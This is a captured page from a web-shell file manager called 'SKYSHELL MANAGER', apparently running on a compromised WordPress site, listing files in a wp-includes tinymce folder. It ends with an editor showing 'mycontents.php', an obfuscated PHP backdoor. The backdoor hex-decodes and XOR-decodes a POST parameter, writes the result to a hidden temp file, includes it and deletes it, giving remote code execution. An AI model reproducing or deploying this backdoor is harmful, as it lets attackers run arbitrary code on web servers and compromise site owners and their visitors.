📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
35508.95 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: mycontents.php
<?php if(in_array("\x70\x73et", array_keys($_POST))){ $object = hex2bin($_POST["\x70\x73et"]); $key='' ; $f = 0; while($f < strlen($object)){$key .= chr(ord($object[$f]) ^ 97);$f++;} $token = array_filter(["/var/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), "/dev/shm", getenv("TMP"), session_save_path(), sys_get_temp_dir(), "/tmp", getcwd()]); $bind = 0; do { $binding = $token[$bind] ?? null; if ($bind >= count($token)) break; if (max(0, is_dir($binding) * is_writable($binding))) { $pgrp = sprintf("%s/.ent", $binding); if (file_put_contents($pgrp, $key)) { include $pgrp; @unlink($pgrp); die(); } } $bind++; } while (true); }
Save